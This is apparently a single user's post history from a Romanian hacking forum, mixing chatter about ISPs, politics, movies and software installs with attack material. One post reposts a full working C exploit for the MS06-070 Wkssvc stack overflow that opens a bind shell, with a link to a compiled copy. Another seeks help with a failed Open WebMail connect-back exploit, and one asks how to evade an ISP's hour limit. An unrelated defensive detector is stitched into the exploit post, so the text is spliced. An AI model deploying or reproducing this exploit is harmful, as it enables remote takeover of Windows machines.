Posts posted by Christian

  1. I also have a connection over PPPoE (not RDS) with 3 pricing plans

    1. Unlimited internet = $10

    2. 12 hours/day = $7

    3. 200 hours/month = $7

    but I've heard that with the 3rd option there's a trick that lets you connect even after you've used up the 200 hours... does anyone know anything?

  2. flyppy wrote: man, sorry, but a bit of grammar wouldn't hurt you...

    honestly it wouldn't hurt you either :@

    it probably doesn't work only on a LAN... the IP you're shutting down has to have port 135 (or 445... I'm not sure) open... but most providers block these ports, so in most cases it won't work

  3. beerlover0008 wrote: Yes, he built many houses, but he holds the property rights; the moment something doesn't suit him he can throw those people out on the street...

    I don't think he'd do that... he's trying hard to look good in Romanians' eyes... imagine how Romanians would look at him if he threw them out of their houses

    beerlover0008 wrote: He also bought himself a party; I saw him in a video made before 1989 having fun with the comrade generals.

    so what... don't you have fun? ;)

    beerlover0008 wrote: In my opinion he rather thinks he's a prophet; he uses religion just to look like a great man.

    your opinion! ;)

    beerlover0008 wrote: I don't see the point of exorcising a stadium before a match, or of the many other stupid things he does.

    he knows what he knows... look, God helped him today too... he drew with Pandurii :@ great luck

    beerlover0008 wrote: I wonder how he made his fortune; did his sheep have golden wool? :D

    they certainly don't have golden wool, but the little wheels in his head are well oiled

    conclusion... JIJI RULZZZZZZZ !!! :@

  4. /***************************************************************************

    Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

    by cocoruder(frankruder_at_hotmail.com),2006.11.15
    page:http://ruder.cdut.net/default.asp

    Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
    correct jmp EBX address and fixed exploit output status.

    Should work on Windows 2000 Server SP4 (All Languages)


    usage:
    ms06070 targetip DomainName

    notice:
    Make sure the DomainName is valid and live,more informations see
    http://research.eeye.com/html/advisories/published/AD20061114.html,
    cocoruder just research the vulnerability and give the exploit for
    Win2000.
    ****************************************************************************/


    #include <stdio.h>
    #include <windows.h>
    #include <winsock.h>
    #include <tchar.h>
    #pragma comment(lib, "wsock32.lib")


    unsigned char SmbNeg[] =
    "x00x00x00x2fxffx53x4dx42x72x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
    "x20x4cx4dx20x30x2ex31x32x00";


    unsigned char Session_Setup_AndX_Request[]=
    "x00x00x00x48xffx53x4dx42x73x00"
    "x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
    "xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
    "x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
    "x62x00";


    unsigned char TreeConnect_AndX_Request[]=
    "x00x00x00x58xffx53x4dx42x75x00"
    "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
    "x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
    "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
    "x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
    "x3fx00";


    unsigned char NTCreate_AndX_Request[]=
    "x00x00x00x64xffx53x4dx42xa2x00"
    "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
    "x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
    "x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
    "x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";


    unsigned char Rpc_Bind_Wkssvc[]=
    "x00x00x00x92xffx53x4dx42x25x00"
    "x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
    "x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
    "x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
    "x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
    "x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
    "x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
    "x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
    "xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
    "x9fxe8x08x00x2bx10x48x60x02x00x00x00";


    unsigned char Rpc_NetrJoinDomain2_Header[]=
    "x00x00x00xa8xffx53x4dx42x25x00"
    "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
    "x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
    "x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
    "x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
    "x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
    "x00x00x00x00"
    "x16x00" //opnum,NetrJoinDomain2
    "x30x2ax42x00"
    "x0ex00x00x00"
    "x00x00x00x00"
    "x0ex00x00x00"
    "x5cx00x5cx00x31x00x37x00x32x00"
    "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
    "x00x00"
    "x10x01x00x00"
    "x00x00x00x00"
    "x10x01x00x00";


    unsigned char Rpc_NetrJoinDomain2_End[]=
    "x00x00x00x00"
    "x00x00x00x00"
    "x00x00x00x00"
    "x01x00x00x00";


    unsigned char *lpDomainName=NULL;
    DWORD dwDomainNameLen=0;



    /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
    unsigned char shellcode[] = ""; /* encoded payload bytes omitted */


    DWORD fill_len_1 =0x84c; //fill data
    DWORD fill_len_2 =0x1000; //fill rubbish data
    DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll
    unsigned char code_jmp8[]= //jmp 8
    "xEBx06x90x90";

    unsigned char *Rpc_NetrJoinDomain2=NULL;
    DWORD dwRpc_NetrJoinDomain2=0;


    unsigned char recvbuff[2048];


    void showinfo(void)
    {
    printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
    printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
    printf("page:http://ruder.cdut.net/default.asp\n\n");
    printf("Code fixed by S A Stevens - 16.11.2006\n");
    printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
    printf("usage:\n");
    printf("ms06070 targetip DomainName\n\n");
    printf("notice:\n");
    printf("Make sure the DomainName is valid and live,more informations see\n");
    printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
    printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");

    }

    void neg ( int s )
    {
    char response[1024];

    memset(response,0,sizeof(response));

    send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
    }



    void MakeAttackPacket(char *lpDomainNameStr)
    {
    DWORD j,len,b_flag;



    dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
    lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

    memset(lpDomainName,0,dwDomainNameLen);

    MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

    *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
    *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

    len=dwDomainNameLen+ //DomainName
    fill_len_1-3*2+ //fill_len_1
    4+ //jmp 8
    4+ //addr jmp ebx
    sizeof(shellcode)-1+ //shellcode
    fill_len_2+ //fill_len_2
    2; //0x0000

    b_flag=0;
    if (len%2==1)
    {
    len++;
    b_flag=1;
    }


    dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
    len+
    sizeof(Rpc_NetrJoinDomain2_End)-1; //end


    //malloc
    Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
    if (Rpc_NetrJoinDomain2==NULL)
    {
    printf("malloc error!\n");
    return;
    }

    //fill nop
    memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);


    j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

    //update para1 length
    *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
    *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;


    //copy header

    memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);

    j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

    //copy DomainName
    memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
    j=j+dwDomainNameLen;

    //calculate offset
    j=j+fill_len_1-3*2;

    //jmp 8
    memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
    j=j+4;

    //jmp ebx address
    *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
    j=j+4;

    //copy shellcode
    memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
    j=j+sizeof(shellcode)-1;

    //fill data
    memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
    j=j+fill_len_2;

    //0x0000(NULL)
    if (b_flag==0)
    {
    Rpc_NetrJoinDomain2[j]=0x00;
    Rpc_NetrJoinDomain2[j+1]=0x00;
    j=j+2;
    }
    else if (b_flag==1)
    {
    Rpc_NetrJoinDomain2[j]=0x00;
    Rpc_NetrJoinDomain2[j+1]=0x00;
    Rpc_NetrJoinDomain2[j+2]=0x00;
    j=j+3;
    }


    //copy other parameter

    memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);

    j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;


    }



    void main(int argc,char **argv)
    {
    WSADATA ws;
    struct sockaddr_in server;
    SOCKET sock;
    DWORD ret;
    WORD userid,treeid,fid;


    WSAStartup(MAKEWORD(2,2),&ws);




    sock = socket(AF_INET,SOCK_STREAM,0);
    if(sock<=0)
    {
    return;
    }

    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_port = htons((USHORT)445);

    printf("[+] Connecting %s\n",argv[1]);

    ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
    if (ret==-1)
    {
    printf("Connection Error, Port 445 Firewalled?\n");
    return;
    }


    neg(sock);

    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

    ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
    if (ret<=0)
    {
    printf("send Session_Setup_AndX_Request error!\n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

    userid=*(WORD *)(recvbuff+0x20); //get userid


    memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


    ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
    if (ret<=0)
    {
    printf("send TreeConnect_AndX_Request error!\n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

    treeid=*(WORD *)(recvbuff+0x1c); //get treeid


    //send NTCreate_AndX_Request
    memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
    memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid


    ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
    if (ret<=0)
    {
    printf("send NTCreate_AndX_Request error!\n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


    fid=*(WORD *)(recvbuff+0x2a); //get fid


    //rpc bind

    memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
    memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
    memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
    *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

    ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
    if (ret<=0)
    {
    printf("send Rpc_Bind_Wkssvc error!\n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


    MakeAttackPacket((char *)argv[2]);


    memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
    memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
    memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
    *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

    *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
    *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count
    *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
    *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length

    ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
    if (ret<=0)
    {
    printf("send Rpc_NetrJoinDomain2 error!\n");
    return;
    }

    printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);

    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);




    closesocket(sock);

    }

    // milw0rm.com [2006-11-17]

    and the compiled version:

    http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
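
A defender-side check for the request this post's code builds, added here as an example and not part of the original post or of any vendor tool: it reads the DCE/RPC request header and the NDR string counts of opnum 0x16 and flags a ServerName or DomainName longer than a sane limit, which is what the posted code produces when it writes len/2 (built from fill_len_1 = 0x84c and fill_len_2 = 0x1000 bytes) into the DomainName counts. The function names, the 256-unit threshold and the sample bytes are assumptions constructed for illustration, and the caller is assumed to have already tied the pipe to wkssvc.

```c
#include <stdint.h>
#include <stdio.h>

#define OPNUM_NETRJOINDOMAIN2 0x16 /* opnum marked in the posted request header */
#define MAX_NAME_WCHARS 256u       /* assumed limit; DNS names are at most 255 chars */

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Reads the max_count/offset/actual_count triple of an NDR string at *off.
 * Returns 0 and stores actual_count (UTF-16 units), or -1 if the data is short. */
static int ndr_str_count(const uint8_t *b, size_t len, size_t *off, uint32_t *n) {
    *off = (*off + 3) & ~(size_t)3; /* counts are 4-byte aligned */
    if (len < *off + 12) return -1;
    *n = rd32(b + *off + 8);
    *off += 12;
    return 0;
}

/* pdu: DCE/RPC PDU taken from a pipe already known to be bound to wkssvc.
 * Returns 1 = oversized name in NetrJoinDomain2, 0 = not flagged, -1 = truncated. */
int check_netrjoindomain2(const uint8_t *pdu, size_t len) {
    uint32_t n;
    size_t off = 28; /* 24-byte request header + 4-byte ServerName referent id */
    if (len < off) return -1;
    if (pdu[0] != 5 || pdu[2] != 0 || (pdu[4] & 0xF0) != 0x10) return 0; /* v5 request, LE */
    if ((pdu[22] | pdu[23] << 8) != OPNUM_NETRJOINDOMAIN2) return 0;
    if (rd32(pdu + 24) != 0) { /* ServerName is a unique pointer and may be NULL */
        if (ndr_str_count(pdu, len, &off, &n)) return -1;
        if (n > MAX_NAME_WCHARS) return 1;
        off += (size_t)n * 2; /* skip the UTF-16 body */
    }
    if (ndr_str_count(pdu, len, &off, &n)) return -1; /* DomainName: no referent id */
    return n > MAX_NAME_WCHARS;
}

/* Constructed sample, not captured traffic: a request with ServerName "\\S",
 * cut off after the DomainName counts; only the first `captured` bytes are checked. */
int classify_sample(uint32_t domain_wchars, size_t captured) {
    uint8_t s[60] = {
        5,0,0,3, 0x10,0,0,0, 60,0,0,0, 1,0,0,0, 36,0,0,0, 0,0, 0x16,0,
        0,0,2,0, 4,0,0,0, 0,0,0,0, 4,0,0,0, '\\',0,'\\',0,'S',0,0,0 };
    for (int i = 0; i < 4; i++)
        s[48 + i] = s[56 + i] = (uint8_t)(domain_wchars >> (8 * i));
    return check_netrjoindomain2(s, captured > sizeof s ? sizeof s : captured);
}

int main(void) {
    printf("short name: %d\n", classify_sample(12, 60));
    printf("0xd00 units: %d\n", classify_sample(0xd00, 60));
    printf("cut at 50 bytes: %d\n", classify_sample(0xd00, 50));
    return 0;
}
```

A sensor that sees only the start of a fragment still gets a verdict, because the counts precede the string body; a return of -1 means the capture ended before the DomainName counts and should be treated as undecided, not as clean.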

  5. Shocker wrote:
    Christian wrote: there would also be a 3rd option, namely hiding it with the attrib command

    e.g.: in CMD, run the command "attrib +H +S FolderName"

    that way the folder will be completely invisible ;)

    It's not completely invisible.

    With the attrib +H +S command you make it Hidden and System, but if you go to Folder Options > Show hidden files and folders and uncheck Hide protected operating system files, you'll see it ;)

    yep... you're right, but let's be serious... how many people do you think know about that option? I for one didn't ;)

  6. I really needed an exploit for Open WebMail... I tested it on Open WebMail version 1.81 and the result is:

    [+] Listen on port: 4444

    [+] Prepairing ShellCode...Done!

    [+] Inject Shellcode to out host...Done!

    [+] Chmod our ShellCode on host...Done!

    [+] Exec ShellCode...Done!

    [+] Wait for Connect-back

    Can't Hack

    User defined signal 2

    any ideas ? :?

  7. Thanks, people! I haven't seen most of the movies you mentioned, so I've got a lot of downloading to do... luckily my provider raised my download speed again ;)

    btw, if anyone knows more movie titles worth a look, I don't think anyone would mind if you posted them here

  8. recuento wrote:
    Christian wrote: :@ :@

    r u crazy dude?

    at 2 MB in size, what can it do? download the whole internet? ;)

    if it were 150% detectable and you sold it on credit, I swear I'd buy it

    if the server takes up 2 MB... how much does the edit server take up? just asking because I'm short on space these days :@

    Smart noob, in case you didn't realize, it's 150% a joke, probably made because of some people's insistence on convincing him to make them who knows what.

    n00b, what would I do without you? I'd probably be better off

    I realized it was a joke and replied with another joke, n00b

  9. what movies have you seen lately that left a good impression?

    can someone point me to 1-2 good movies? (newer ones if possible) because honestly I'm fed up with watching crappy movies (and when I say crappy I mean CRAPPY !!!). I don't want to waste my time on movies like that anymore, so... give me some names !?!

  10. Thanks virusz for the programs

    I personally get along fine with rapidshare... I download from it at full speed (62 kB/s), whereas from urban I get at most 30 kB/s

    the only downside is that files on rapidshare expire fairly quickly

    speaking of VC++... in case anyone grabs it...

    it won't install just by running Setup.exe... to install it, follow these steps:

    1. make a copy of the file setup/VS98ENT.STF and rename it to acmsetup.STF

    2. copy everything in the /setup/ folder into the parent folder (the one containing ACMBOOT.EXE)

    *. don't forget to also put acmsetup.STF in the folder containing ACMBOOT.EXE

    3. install by running acmsetup.exe or Setup.exe

    4. Enjoy it!

    I haven't tested the other programs and don't know whether they cause problems during installation

  11. BizZaroO wrote: hey guys!!!! what's the password for the second game? it's not like lvl 1 :((

    function Try(passwd) {
      // The expected password is compared in the browser, so it is readable in the page source
      if (passwd == "h4x0r") {
        alert("Alright! On to level 2...");
        location.href = "level2-xfdgnh.xhtml";
      }
      else {
        alert("The password is incorrect. Please don't try again.");
        location.href = "http://www.disney.com/";
      }
    }

    you can find this in the page source

    but what charm does the game have left if someone else tells you the answers?

    try to figure them out yourself
